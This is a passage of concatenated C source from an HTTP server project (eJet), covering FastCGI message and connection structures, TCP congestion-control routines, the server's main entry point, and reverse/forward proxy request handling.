/* encoded octet stream for a fastcgi abort :
abort request(01 02 00 01 00 00 00 00) (8 bytes)
*/
uint8 fcgi_abort[8];
/* received octet stream from cgi-server:
fcgi_stdout_header (01 06 00 01 XX XX YY 00) (8 bytes)
................. (content-length XXXX bytes' response header and body)
padding 0 (YY bytes for 8-byte alignment)
end request header (01 03 00 01 00 08 00 00) (8 bytes)
end request body (00 00 00 00 00 08 00 00) (8 bytes)
*/
uint32 app_status;
uint8 proto_status;
uint8 got_all_header;
uint8 got_end_request;
FcgiHeader cgihdr;
ulong conid;
void * pcon;
time_t createtime;
time_t stamp;
FcgiSrv * srv;
} FcgiMsg, fcgi_msg_t;
int fcgi_header_type_valid (uint8 type, int resp);
int fcgi_header_decode (void * p, int len, FcgiHeader * hdr);
int http_fcgimsg_cmp_fcgimsg (void * a, void *b);
int http_fcgimsg_cmp_msgid (void * a, void *b);
ulong http_fcgimsg_hash_msgid (void * key);
int http_fcgimsg_init (void * vmsg);
int http_fcgimsg_free (void * vmsg);
void * http_fcgimsg_fetch (void * vsrv);
int http_fcgimsg_recycle (void * vmsg);
void * http_fcgimsg_open (void * vsrv, void * vhttpmsg);
int http_fcgimsg_close (void * vmsg);
int http_fcgimsg_abort (void * vmsg);
int http_fcgimsg_request_encode (void * vmsg);
int http_fcgimsg_abort_encode (void * vmsg);
int http_fcgimsg_stdin_init (void * vmsg);
int http_fcgimsg_stdin_encode (void * vmsg, void * pbyte, int bytelen, int end);
int http_fcgimsg_stdin_end_encode (void * vmsg);
int http_fcgimsg_stdin_body_sentnum (void * vmsg, int sentlen);
int http_fcgimsg_pre_crash (void * vmsg, int status);
int http_fcgimsg_stdin_encode_chunk (void * vmsg, void * pbyte, int bytelen, void * porig, int end);
int http_fcgimsg_stdin_end_encode_chunk (void * vmsg);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_fcgi_con.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_FCGI_CON_H_
#define _HTTP_FCGI_CON_H_
#include "http_fcgi_msg.h"
#ifdef __cplusplus
extern "C" {
#endif
/* timer command id that identify the timeout event type */
#define t_fcgi_srv_con_build 2310
#define t_fcgi_srv_con_life 2312
/* HTTP connection automation state definition for FCGI Receiving (Request or Response) */
#define FCGI_CON_NULL 0
#define FCGI_CON_READY 1
#define FCGI_CON_RECVING 3
#define FCGI_CON_WAITING_HEADER 4
#define FCGI_CON_WAITING_BODY 5
/* HTTP connection automation state definition for FCGI Sending (Request or Response) */
#define FCGI_CON_IDLE 0
#define FCGI_CON_CONNECTING 10
#define FCGI_CON_SEND_READY 11
#define FCGI_CON_FEEDING 12
typedef struct http_fcgi_con {
void * res[2];
ulong conid;
int rcv_state;
int snd_state;
uint8 socktype; //0-TCP 1-Unix Socket
char unixsock[256];
char dstip[41];
int dstport;
/* following members used for accept-client probe-device management */
CRITICAL_SECTION rcvCS;
void * pdev;
int read_ignored;
frame_p rcvstream;
void * ready_timer;
time_t stamp;
time_t createtime;
void * life_timer;
unsigned retrytimes : 4;
unsigned reqnum : 12;
unsigned resnum : 10;
unsigned keepalive : 1;
/* current handling FcgiMsg request instance */
FcgiMsg * msg;
/* multiple requests occur over single tcp connection, response
* should be pipelined to reply to client */
arr_t * msg_list;
CRITICAL_SECTION msglistCS;
/* system management instance */
void * pcore;
void * srv;
} FcgiCon, fcgi_con_t;
int http_fcgicon_cmp_fcgicon (void * a, void * b);
int http_fcgicon_cmp_conid (void * a, void * pat);
ulong http_fcgicon_hash_func (void * key);
/* http connection instance release/initialize/recycle routines */
int http_fcgicon_init (void * vcon);
int http_fcgicon_free (void * vcon);
int http_fcgicon_recycle (void * vcon);
void * http_fcgicon_fetch (void * vmgmt);
void * http_fcgicon_open (void * vsrv);
int http_fcgicon_close (void * vcon);
int http_fcgicon_connect (void * vpcon);
int http_fcgicon_connected (void * vpcon);
int http_fcgicon_reqnum (void * vcon);
ulong http_fcgicon_id (void * vcon);
void * http_fcgicon_device (void * vcon);
int http_fcgicon_msg_add (void * vcon, void * vmsg);
int http_fcgicon_msg_del (void * vcon, void * vmsg);
void * http_fcgicon_msg_first (void * vcon);
void * http_fcgicon_msg_last (void * vcon);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_cc.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
Congestion Control of underlying TCP is activated by removing
the event-notification and filling the receiving buffer of TCP connection
*/
#include "adifall.ext"
#include "epump.h"
#include "http_con.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_srv.h"
#include "http_cli_io.h"
#include "http_srv_io.h"
#include "http_fcgi_srv.h"
#include "http_fcgi_msg.h"
#include "http_fcgi_con.h"
#include "http_fcgi_io.h"
extern HTTPMgmt * gp_httpmgmt;
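/* Receive-side congestion check for a client connection. When the tunnel, proxy
   or FastCGI peer already has more buffered data pending than the configured
   limit, the READ event of this connection is ignored so that the kernel receive
   buffer fills up and TCP flow control throttles the client. Returns a positive
   value while receiving is suppressed, a negative value if a dead connection is
   detected, and 0 otherwise. */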
int http_cli_recv_cc (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMgmt * mgmt = NULL;
HTTPMsg * msg = NULL;
HTTPMsg * srvmsg = NULL;
HTTPCon * srvcon = NULL;
FcgiSrv * cgisrv = NULL;
FcgiMsg * cgimsg = NULL;
FcgiCon * cgicon = NULL;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -2;
/* === TUNNEL === */
if (pcon->httptunnel == 1 && pcon->tunnelcon &&
frameL(pcon->rcvstream) >= mgmt->proxy_buffer_size)
{
/* For a tunneled client connection, if the client-side receiving speed is
   greater than the server-side sending speed, a lot of data will pile up in
   rcvstream. Receiving must be throttled by ignoring the READ event, which
   activates the TCP congestion-control mechanism */
iodev_del_notify(pcon->pdev, RWF_READ);
pcon->read_ignored++;
if (!tcp_connected(iodev_fd(pcon->pdev))) {
http_con_close(pcon->tunnelcon);
http_con_close(pcon);
return -100;
}
time(&pcon->stamp);
return 1;
}
/* === PROXY === */
msg = http_con_msg_first(pcon);
if (msg && msg->proxied == 1 && (srvmsg = msg->proxymsg) &&
chunk_rest_size(srvmsg->req_body_chunk, 0) >= mgmt->proxy_buffer_size)
{
/* congestion control: by neglecting the read-ready event,
underlying TCP stack recv-buffer will be full soon.
TCP stack will start congestion control mechanism */
iodev_del_notify(pcon->pdev, RWF_READ);
pcon->read_ignored++;
srvcon = srvmsg->pcon;
if (!tcp_connected(iodev_fd(pcon->pdev)) ||
(srvcon && !tcp_connected(iodev_fd(srvcon->pdev)))
) {
http_con_close(srvmsg->pcon);
http_con_close(pcon);
return -100;
}
time(&pcon->stamp);
return 2;
}
/* === FastCGI === */
if (msg && msg->fastcgi == 1 && (cgimsg = msg->fcgimsg) &&
chunk_rest_size(cgimsg->req_body_chunk, 0) >= mgmt->fcgi_buffer_size)
{
/* congestion control: by neglecting the read-ready event,
underlying TCP stack recv-buffer will be full soon.
TCP stack will start congestion control mechanism */
iodev_del_notify(pcon->pdev, RWF_READ);
pcon->read_ignored++;
cgisrv = (FcgiSrv *)cgimsg->srv;
cgicon = http_fcgisrv_con_get(cgisrv, cgimsg->conid);
if (!tcp_connected(iodev_fd(pcon->pdev)) /*||
(cgicon && !tcp_connected(iodev_fd(cgicon->pdev))) */
) {
http_fcgicon_close(cgicon);
http_con_close(pcon);
return -100;
}
time(&pcon->stamp);
return 3;
}
return 0;
}
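/* Send-side de-congestion for a client connection: once the data buffered for the
   client drops below the configured limit, the READ notification of the tunnel,
   proxy or FastCGI peer that was ignored earlier is re-added and its pending data
   is read immediately. */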
int http_cli_send_cc (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMgmt * mgmt = NULL;
HTTPMsg * msg = NULL;
HTTPMsg * srvmsg = NULL;
HTTPCon * srvcon = NULL;
FcgiSrv * cgisrv = NULL;
FcgiMsg * cgimsg = NULL;
FcgiCon * cgicon = NULL;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -2;
/* while the connection to the client is congested, data from the peer side
   piles up. after data has been sent to the client successfully, the peer
   connection should be monitored again for event notification.
 */
/* === TUNNEL === */
if (pcon->httptunnel == 1 && (srvcon = pcon->tunnelcon) &&
srvcon->read_ignored > 0 && frameL(srvcon->rcvstream) < mgmt->proxy_buffer_size)
{
iodev_add_notify(srvcon->pdev, RWF_READ);
srvcon->read_ignored = 0;
http_srv_recv(srvcon);
return 1;
}
/* === PROXY === */
msg = http_con_msg_first(pcon);
if (msg && msg->proxied == 1 && (srvmsg = msg->proxymsg)) {
srvcon = srvmsg->pcon;
if (srvcon && srvcon->read_ignored > 0 &&
chunk_rest_size(msg->res_body_chunk, 0) < mgmt->proxy_buffer_size)
{
iodev_add_notify(srvcon->pdev, RWF_READ);
srvcon->read_ignored = 0;
http_srv_recv(srvcon);
return 2;
}
}
/* === FastCGI === */
if (msg && msg->fastcgi == 1 && (cgimsg = msg->fcgimsg)) {
cgisrv = (FcgiSrv *)cgimsg->srv;
cgicon = http_fcgisrv_con_get(cgisrv, cgimsg->conid);
/* read the blocked data in server-side kernel socket for
client-side congestion control */
if (cgicon && cgicon->read_ignored > 0 &&
chunk_rest_size(msg->res_body_chunk, 0) < mgmt->fcgi_buffer_size)
{
iodev_add_notify(cgicon->pdev, RWF_READ);
cgicon->read_ignored = 0;
http_fcgi_recv(cgicon);
return 3;
}
}
return 0;
}
int http_srv_recv_cc (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMgmt * mgmt = NULL;
HTTPMsg * msg = NULL;
HTTPMsg * climsg = NULL;
HTTPCon * clicon = NULL;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -2;
if ((clicon = pcon->tunnelcon) && frameL(pcon->rcvstream) >= mgmt->proxy_buffer_size) {
/* For the tunneled server-side connection, if the server-side receiving speed
   is greater than the client-side sending speed, a lot of data will pile up in
   rcvstream. Receiving must be throttled by ignoring the READ event, which
   activates the TCP congestion-control mechanism */
iodev_del_notify(pcon->pdev, RWF_READ);
pcon->read_ignored++;
if (!tcp_connected(iodev_fd(pcon->pdev))) {
http_con_close(pcon->tunnelcon);
http_con_close(pcon);
return -100;
}
time(&pcon->stamp);
if (pcon->srv)
time(&((HTTPSrv *)(pcon->srv))->stamp);
return 1;
}
msg = http_con_msg_first(pcon);
if (msg && msg->proxied == 2 && (climsg = msg->proxymsg) && !climsg->cacheon &&
chunk_rest_size(climsg->res_body_chunk, 0) >= mgmt->proxy_buffer_size)
{
/* congestion control: by neglecting the read-ready event,
underlying TCP stack recv-buffer will be full soon.
TCP stack will start congestion control mechanism */
iodev_del_notify(pcon->pdev, RWF_READ);
pcon->read_ignored++;
clicon = climsg->pcon;
if (!tcp_connected(iodev_fd(pcon->pdev)) ||
(clicon && !tcp_connected(iodev_fd(clicon->pdev)))
) {
http_con_close(climsg->pcon);
http_con_close(pcon);
return -100;
}
time(&pcon->stamp);
if (pcon->srv)
time(&((HTTPSrv *)(pcon->srv))->stamp);
return 2;
}
return 0;
}
int http_srv_send_cc (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMgmt * mgmt = NULL;
HTTPMsg * msg = NULL;
HTTPMsg * climsg = NULL;
HTTPCon * clicon = NULL;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -2;
/* while the connection to the server is congested, data from the peer side
   piles up. after data has been sent to the server successfully, the peer
   connection should be monitored again for event notification.
 */
/* === TUNNEL === */
if (pcon->httptunnel == 2 && (clicon = pcon->tunnelcon) &&
clicon->read_ignored > 0 && frameL(clicon->rcvstream) < mgmt->proxy_buffer_size)
{
iodev_add_notify(clicon->pdev, RWF_READ);
clicon->read_ignored = 0;
http_cli_recv(clicon);
return 1;
}
/* === PROXY === */
msg = http_con_msg_first(pcon);
if (msg && msg->proxied == 2 && (climsg = msg->proxymsg)) {
clicon = climsg->pcon;
if (clicon && clicon->read_ignored > 0 &&
chunk_rest_size(msg->req_body_chunk, 0) < mgmt->proxy_buffer_size)
{
iodev_add_notify(clicon->pdev, RWF_READ);
clicon->read_ignored = 0;
http_cli_recv(clicon);
return 2;
}
}
return 0;
}
int http_fcgi_recv_cc (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
FcgiMsg * msg = NULL;
HTTPMsg * httpmsg = NULL;
HTTPCon * httpcon = NULL;
HTTPMgmt * mgmt = NULL;
if (!pcon) return -1;
msg = http_fcgicon_msg_first(pcon);
if (msg) httpmsg = msg->httpmsg;
if (httpmsg) mgmt = httpmsg->httpmgmt;
if (!mgmt) mgmt = gp_httpmgmt;
if (msg && httpmsg && mgmt &&
chunk_rest_size(httpmsg->res_body_chunk, 0) >= mgmt->fcgi_buffer_size)
{
/* congestion control: by neglecting the read-ready event,
underlying TCP/UnixSocket stack recv-buffer will be full soon.
TCP/UnixSocket stack will start congestion control mechanism */
iodev_del_notify(pcon->pdev, RWF_READ);
pcon->read_ignored++;
httpcon = httpmsg->pcon;
if (/*!tcp_connected(iodev_fd(pcon->pdev)) ||*/
(httpcon && !tcp_connected(iodev_fd(httpcon->pdev)))
) {
http_con_close(httpmsg->pcon);
http_fcgicon_close(pcon);
return -100;
}
time(&pcon->stamp);
if (pcon->srv)
time(&((FcgiSrv *)(pcon->srv))->stamp);
return 1;
}
return 0;
}
int http_fcgi_send_cc (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
FcgiMsg * msg = NULL;
HTTPMsg * httpmsg = NULL;
HTTPCon * httpcon = NULL;
HTTPMgmt * mgmt = NULL;
if (!pcon) return -1;
msg = http_fcgicon_msg_first(pcon);
if (msg && (httpmsg = msg->httpmsg) && httpmsg->fastcgi == 1) {
httpcon = httpmsg->pcon;
mgmt = (HTTPMgmt *)httpmsg->httpmgmt;
if (!mgmt) mgmt = gp_httpmgmt;
/* read the blocked data in server-side kernel socket for
client-side congestion control */
if (httpcon && httpcon->read_ignored > 0 &&
chunk_rest_size(msg->req_body_chunk, 0) < mgmt->fcgi_buffer_size)
{
iodev_add_notify(httpcon->pdev, RWF_READ);
httpcon->read_ignored = 0;
http_cli_recv(httpcon);
return 1;
}
}
return 0;
}
<|start_filename|>ejetsrv/ejetsrv.c<|end_filename|>
#include "adifall.ext"
#include <signal.h>
#include "epump.h"
#include "ejet.h"
void * g_quitsys_event = NULL;
void * g_pcore = NULL;
#ifdef _WIN32
CHAR * g_ServiceName = "ejetsrv";
#endif
int EntryPoint (int argc, char ** argv);
int system_shutdown ()
{
epcore_stop_epump(g_pcore);
epcore_stop_worker(g_pcore);
SLEEP(1000);
event_set(g_quitsys_event, -10);
return 0;
}
static void signal_handler(int sig)
{
switch(sig) {
case SIGHUP:
tolog(1, "hangup signal catched\n" );
break;
case SIGTERM:
case SIGKILL:
case SIGINT:
tolog(1, "terminate signal catched, now exiting...\n");
system_shutdown();
break;
}
}
char * sys_version ()
{
static char sysver[] = "Ver: 1.2.4 Built: "__TIME__", " __DATE__;
return sysver;
}
int main (int argc, char ** argv)
{
if (argc == 2 && strcasecmp(argv[1], "--version") == 0) {
printf("%s\n", sys_version());
return 0;
}
return EntryPoint(argc, argv);
}
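/* Actual program entry: parses the command-line options, acquires the global file
   lock, optionally daemonizes, installs the signal handlers, initializes logging,
   the epcore event engine and the HTTP management instance, then starts the worker
   and epump threads and runs until shutdown is requested. */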
int EntryPoint (int argc, char ** argv)
{
void * pcore = NULL;
int opt;  /* getopt() returns an int; comparing a plain char with -1 is not portable */
int cpunum = 0;
int epumpnum = 0;
int workernum = 0;
void * httpmgmt = NULL;
char * jsonconf = "ejet.conf";
void * hlog = NULL;
uint8 daemon = 0;
char * plockfile = "ejetsrv.lck",
* pinstalldir = ".";
int lock_fd = -1;
#ifdef UNIX
struct sigaction sa;
char * glocksrv = "/var/lock/subsys/ejetsrv";
void * glock = NULL;
#endif
if (argc < 2) {
fprintf(stderr, "Usage: %s [-j json file] [-L exclusive file] [-d] "
"[-l lockfile.lck] [-i install-dir]\n", argv[0]);
return 0;
}
while ((opt = getopt(argc, argv, "l:L:i:j:d")) != -1) {  /* include 'L:' so the -L case below is reachable */
switch (opt) {
case 'j':
jsonconf = optarg;
break;
case 'L':
glocksrv = optarg;
break;
case 'd':
daemon = 1;
break;
case 'i':
pinstalldir = optarg;
break;
case 'l':
    plockfile = optarg;  /* per the usage text, -l sets the daemon lock file */
    break;
default:
fprintf(stderr, "Unknown option -%c\n", opt);
break;
}
}
#ifdef _WIN32
const char * strMutexName = "HttpService3280834";
HANDLE hMutex = NULL;
//main_entry(argc, argv);
hMutex = CreateMutex(NULL, TRUE, strMutexName);
if (ERROR_ALREADY_EXISTS == GetLastError() || NULL == hMutex)
return 0;
#endif
#ifdef UNIX
signal(SIGPIPE, SIG_IGN);
sa.sa_handler = SIG_IGN;
sa.sa_flags = 0;
if (sigemptyset(&sa.sa_mask) == -1 || sigaction(SIGPIPE, &sa, 0) == -1) {
perror("failed to ignore SIGPIPE in sigaction");
exit(0);
}
if (!file_exist(glocksrv)) {
file_dir_create(glocksrv, 1);
}
if (file_mutex_locked(glocksrv) != 0) {
exit(0);
}
if (daemon) {
lock_fd = daemonize (plockfile, pinstalldir);
}
signal(SIGCHLD, SIG_IGN); /* ignore child */
signal(SIGTSTP, SIG_IGN); /* ignore tty signals */
signal(SIGTTOU, SIG_IGN);
signal(SIGPIPE, SIG_IGN);
signal(SIGTTIN, SIG_IGN);
signal(SIGHUP, signal_handler); /* catch hangup signal */
signal(SIGTERM, signal_handler); /* catch kill signal */
signal(SIGINT, signal_handler); /* catch SIGINT signal */
glock = file_mutex_init(glocksrv);
file_mutex_lock(glock);
#endif
hlog = trlog_init("ejet.log", 0);
pcore = epcore_new(65535, 1);
g_pcore = pcore;
httpmgmt = http_mgmt_alloc(pcore, jsonconf, 0, 0);
http_mgmt_init(httpmgmt);
//http_mgmt_set_reqhandler(httpmgmt, handle_request);
/* now startup the system, epump as the engine will be erected */
cpunum = get_cpu_num();
epumpnum = cpunum * 0.2;
if (epumpnum < 3) epumpnum = 3;
workernum = cpunum - epumpnum;
if (workernum < 3) workernum = 3;
/* start worker threads */
epcore_start_worker(pcore, workernum);
/* start epump threads */
epcore_start_epump(pcore, epumpnum - 1);
#ifdef _DEBUG
/* create new epump thread executing the epump_main_proc */
epump_main_start(pcore, 1);
g_quitsys_event = event_create();
while(event_wait(g_quitsys_event, 1000) != -10) {
continue;
}
event_destroy(g_quitsys_event);
#else
/* main thread executing the epump_main_proc as an epump thread */
epump_main_start(pcore, 0);
#endif
http_mgmt_cleanup(httpmgmt);
epcore_clean(pcore);
#ifdef UNIX
file_mutex_unlock(glock);
file_mutex_destroy(glock);
if (lock_fd >= 0) close(lock_fd);
#endif
#ifdef _WIN32
CloseHandle(hMutex);
#endif
trlog_clean(hlog);
#ifdef _DEBUG
printf("\nMAIN Thread exited successfully...\n");
#endif
return 0;
}
<|start_filename|>src/http_proxy.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_con.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_cli_io.h"
#include "http_srv_io.h"
#include "http_listen.h"
#include "http_request.h"
#include "http_response.h"
#include "http_srv.h"
#include "http_chunk.h"
#include "http_ssl.h"
#include "http_cache.h"
#include "http_cc.h"
#include "http_fcgi_io.h"
#include "http_handle.h"
#include "http_proxy.h"
extern char * g_http_version;
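/* Proxy entry for a client request: checks whether the request matches a proxy or
   forward-proxy configuration, returns early if a complete cached copy already
   exists locally, otherwise builds a proxy HTTPMsg and starts asynchronous DNS
   resolution of the origin host. A negative return value means the request is not
   handled in proxy mode or proxying failed. */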
int http_proxy_handle (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMsg * proxymsg = NULL;
char url[4096];
if (!msg) return -1;
/* check whether the request should be proxied to another origin server */
if (http_proxy_check(msg, url, sizeof(url)-1) <= 0)
return -100;
if (http_proxy_cache_open(msg) >= 3) {
/* cache file exists in local directory */
return -200;
}
/* create one proxy HTTPMsg object, with headers X-Forwarded-For and X-Real-IP */
proxymsg = msg->proxymsg = http_proxy_srvmsg_open(msg, url, strlen(url));
if (proxymsg == NULL) {
return -300;
}
msg->proxied = 1;
if (http_srv_msg_dns(proxymsg, http_proxy_srvmsg_dns_cb) < 0) {
msg->proxied = 0;
msg->proxymsg = NULL;
http_msg_close(proxymsg);
return -400;
}
return 0;
}
int http_proxy_check (void * vmsg, void * purl, int urlen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPListen * hl = NULL;
char * url = (char *)purl;
int ret = 0;
if (!msg) return 0;
if (msg->proxied == 1) {
/* if a new absolute URL was rewritten for forwarding or proxying, start the proxy operation */
if (msg->req_url_type > 0) {
str_secpy(url, urlen, frameP(msg->docuri->uri), frameL(msg->docuri->uri));
if (msg->fwdurl) kfree(msg->fwdurl);
msg->fwdurllen = frameL(msg->docuri->uri);
msg->fwdurl = str_dup(frameP(msg->docuri->uri), frameL(msg->docuri->uri));
return 1;
}
msg->proxied = 0;
}
hl = (HTTPListen *)msg->hl;
if (!hl) return 0;
if (msg->req_url_type > 0 && !msg->ploc && hl->forwardproxy == 1) {
/* the web server also acts as a forward proxy for the requesting client;
   the url in the request line is an absolute address and has no Loc instance. */
str_secpy(url, urlen, frameP(msg->uri->uri), frameL(msg->uri->uri));
if (msg->fwdurl) kfree(msg->fwdurl);
msg->fwdurllen = frameL(msg->uri->uri);
msg->fwdurl = str_dup(frameP(msg->uri->uri), frameL(msg->uri->uri));
return 1;
}
if (!msg->ploc) return 0;
/* location / {
* path = [ '/', '^~' ];
* type = server;
* index = [ index.html, index.htm ];
* root = /opt/httpdoc/;
* }
* location {
* path = [ '/cache/', '^~' ];
* type = proxy
* passurl = http://www.abcxxx.com/;
* }
* /cache/cdn/view?fid=3782837A0FA83B764E36A377B366CE98&stamp=327239843983
* url -->
* http://www.abcxxx.com/cdn/view?fid=3782837A0FA83B764E36A377B366CE98&stamp=327239843983
*/
ret = http_loc_passurl_get(msg, SERV_PROXY, url, urlen);
if (ret > 0) {
if (msg->fwdurl) kfree(msg->fwdurl);
msg->fwdurllen = strlen(url);
msg->fwdurl = str_dup(url, msg->fwdurllen);
return 1;
}
return 0;
}
int http_proxy_srv_send_start (void * vproxymsg)
{
HTTPMsg * proxymsg = (HTTPMsg *)vproxymsg;
HTTPMgmt * mgmt = NULL;
HTTPCon * proxycon = NULL;
HTTPSrv * srv = NULL;
if (!proxymsg) return -1;
mgmt = (HTTPMgmt *)proxymsg->httpmgmt;
if (!mgmt) return -2;
srv = http_srv_open(mgmt, proxymsg->dstip, proxymsg->dstport, proxymsg->ssl_link, 100);
if (!srv) return -100;
proxycon = http_srv_connect(srv);
if (proxycon) {
/* upcoming R/W events of proxycon will be delivered to the current thread,
   to pipeline reads and writes between the two HTTP connections */
iodev_workerid_set(proxycon->pdev, 1);
http_con_msg_add(proxycon, proxymsg);
http_proxy_srv_send(proxycon, proxymsg);
} else {
http_srv_msg_push(srv, proxymsg);
}
return 0;
}
int http_proxy_srvmsg_dns_cb (void * vproxymsg, char * name, int len, void * cache, int status)
{
HTTPMsg * proxymsg = (HTTPMsg *)vproxymsg;
HTTPMsg * climsg = NULL;
int ret = 0;
if (!proxymsg) return -1;
climsg = proxymsg->proxymsg;
if (status == DNS_ERR_IPV4 || status == DNS_ERR_IPV6) {
str_secpy(proxymsg->dstip, sizeof(proxymsg->dstip)-1, name, len);
} else if (dns_cache_getip(cache, 0, proxymsg->dstip, sizeof(proxymsg->dstip)-1) <= 0) {
tolog(1, "eJet - Proxy: DNS Resolving of Origin Server '%s' failed.\n", name);
ret = -100;
goto failed;
}
if (http_proxy_srv_send_start(proxymsg) < 0) {
ret = -200;
goto failed;
}
return 0;
failed:
if (climsg) {
climsg->SetStatus(climsg, 404, NULL);
climsg->Reply(climsg);
}
http_con_msg_del(proxymsg->pcon, proxymsg);
http_msg_close(proxymsg);
return ret;
}
void * http_proxy_srvmsg_open (void * vmsg, char * url, int urllen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMsg * proxymsg = NULL;
HeaderUnit * punit = NULL;
CacheInfo * cacinfo = NULL;
int i, num;
char buf[512];
int ret = 0;
if (!msg) return NULL;
/* firstly, check if the local storage has stored the request content.
if it has, return it to client. */
proxymsg = http_msg_fetch(msg->httpmgmt);
if (!proxymsg) return NULL;
proxymsg->SetMethod(proxymsg, msg->req_meth, -1);
proxymsg->SetURL(proxymsg, url, urllen, 1);
proxymsg->req_url_type = msg->req_url_type;
proxymsg->dstport = proxymsg->req_port;
str_cpy(proxymsg->srcip, msg->srcip);
proxymsg->srcport = msg->srcport;
/* duplicate all the request headers into proxy msg */
num = arr_num(msg->req_header_list);
for (i = 0; i < num; i++) {
punit = (HeaderUnit *)arr_value(msg->req_header_list, i);
if (!punit || !punit->name || punit->namelen < 1) {
continue;
}
if (strncasecmp(HUName(punit), "User-Agent", 10) == 0) {
str_secpy(buf, sizeof(buf)-1, HUValue(punit), punit->valuelen);
snprintf(buf + strlen(buf), sizeof(buf)-1-strlen(buf), " via eJet/%s", g_http_version);
http_header_append(proxymsg, 0, HUName(punit), punit->namelen, buf, strlen(buf));
} else {
http_header_append(proxymsg, 0, HUName(punit), punit->namelen,
HUValue(punit), punit->valuelen);
}
}
cacinfo = (CacheInfo *)msg->res_cache_info;
if (cacinfo) {
http_header_del(proxymsg, 0, "Range", -1);
#if defined(_WIN32) || defined(_WIN64)
sprintf(buf, "bytes=%I64d-", msg->cache_req_off);
#else
sprintf(buf, "bytes=%lld-", msg->cache_req_off);
#endif
if (msg->cache_req_len > 0 &&
msg->cache_req_off + msg->cache_req_len < cacinfo->body_length)
#if defined(_WIN32) || defined(_WIN64)
sprintf(buf+strlen(buf), "%I64d", msg->cache_req_off + msg->cache_req_len - 1);
#else
sprintf(buf+strlen(buf), "%lld", msg->cache_req_off + msg->cache_req_len - 1);
#endif
http_header_append(proxymsg, 0, "Range", -1, buf, strlen(buf));
}
proxymsg->cacheon = msg->cacheon;
if (http_header_get(msg, 0, "Connection", -1) == NULL) {
http_header_append(proxymsg, 0, "Connection", -1, "keep-alive", -1);
}
/* req_body_chunk stores the body either as Content-Length data or as
   Transfer-Encoding chunked data; the chunked body is not parsed here */
proxymsg->req_body_flag = msg->req_body_flag;
proxymsg->req_body_length = msg->req_body_length;
proxymsg->req_multipart = msg->req_multipart;
proxymsg->req_conn_keepalive = msg->req_conn_keepalive;
proxymsg->partial_flag = msg->partial_flag;
for (i = 0; i < vstar_num(msg->partial_list); i++)
vstar_push(proxymsg->partial_list, vstar_get(msg->partial_list, i));
ret = http_req_encoding(proxymsg, 0);
if (ret < 0) {
http_msg_close(proxymsg);
return NULL;
}
msg->proxied = 1;
proxymsg->proxied = 2;
proxymsg->proxymsg = msg;
proxymsg->ploc = msg->ploc;
proxymsg->phost = msg->phost;
proxymsg->state = HTTP_MSG_SENDING;
return proxymsg;
}
int http_proxy_srv_send (void * vsrvcon, void * vsrvmsg)
{
HTTPCon * srvcon = (HTTPCon *)vsrvcon;
HTTPMsg * srvmsg = (HTTPMsg *)vsrvmsg;
HTTPCon * clicon = NULL;
HTTPMsg * climsg = NULL;
HTTPChunk * chunk = NULL;
frame_t * frm = NULL;
uint8 isend = 0;
int ret;
int rcvslen = 0;
uint8 * pbgn = NULL;
int num = 0;
if (!srvcon) return -1;
if (!srvmsg) return -2;
climsg = srvmsg->proxymsg;
if (!climsg) return -3;
clicon = climsg->pcon;
if (!clicon) return -4;
if (climsg->proxied != 1) return -10;
if (srvmsg->proxied != 2) return -11;
frm = clicon->rcvstream;
pbgn = frameP(frm);
num = frameL(frm);
if (num > 0) {
arr_push(srvmsg->req_rcvs_list, frm);
clicon->rcvstream = frame_new(8192);
}
chunk = (HTTPChunk *)srvmsg->req_chunk;
if (climsg->req_body_flag == BC_CONTENT_LENGTH &&
climsg->req_body_length - srvmsg->req_body_iolen > 0 && num > 0)
{
/* remaining body to be sent */
rcvslen = climsg->req_body_length - srvmsg->req_body_iolen;
rcvslen = min(num, rcvslen);
climsg->req_body_iolen += rcvslen;
srvmsg->req_body_iolen += rcvslen;
climsg->req_stream_recv += rcvslen;
isend = srvmsg->req_body_iolen >= climsg->req_body_length;
if (rcvslen > 0) {
chunk_add_bufptr(srvmsg->req_body_chunk, pbgn, rcvslen, frm);
}
} else if (climsg->req_body_flag == BC_TE && num > 0) {
ret = http_chunk_add_bufptr(chunk, pbgn, num, &rcvslen);
isend = chunk->gotall;
if (ret >= 0 && rcvslen > 0) {
chunk_add_bufptr(srvmsg->req_body_chunk, pbgn, rcvslen, frm);
}
climsg->req_body_iolen += rcvslen;
srvmsg->req_body_iolen += rcvslen;
climsg->req_stream_recv += rcvslen;
} else if (climsg->req_body_flag == BC_NONE || climsg->req_body_length == 0) {
isend = 1;
}
if (isend && num > rcvslen) {
frame_put_nfirst(clicon->rcvstream, pbgn + rcvslen, num - rcvslen);
}
if (isend) {
clicon->rcv_state = HTTP_CON_READY;
chunk_set_end(srvmsg->req_body_chunk);
} else {
clicon->rcv_state = HTTP_CON_WAITING_BODY;
}
return http_srv_send(srvcon);
}
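/* Duplicate the origin-server response into the client HTTPMsg: copy the status
   code and all response headers, inherit the body flag/length and keepalive
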